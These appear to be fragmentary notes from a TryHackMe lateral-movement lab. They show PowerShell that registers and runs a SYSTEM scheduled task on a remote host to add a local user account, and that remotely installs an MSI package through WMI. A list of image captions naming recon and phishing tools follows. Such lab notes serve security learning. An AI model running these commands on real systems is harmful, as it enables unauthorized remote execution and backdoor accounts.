# Create and execute a scheduled task remotely # Payload must be split in Command and Args $Command = "cmd.exe" $Args = "/c net user munra22 aSdf1234 /add" $Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2" TaskPath TaskName State PSComputerName -------- -------- ----- -------------- \ THMtask2 Ready thmiis.za.tryhackme.com Start-ScheduledTask -CimSession $Session -TaskName "THMtask2" # Delete the scheduled task Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"
# Install and MSI package Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false} ReturnValue PSComputerName ----------- -------------- 1603 thmiis.za.tryhackme.com
Images
Img1. Gophish
 
Img2. DNSdumpster
Img3. Shodan
Img4. Spiderfoot
Img5. Censys
Img6. InSSIDer
Img7. Kismet
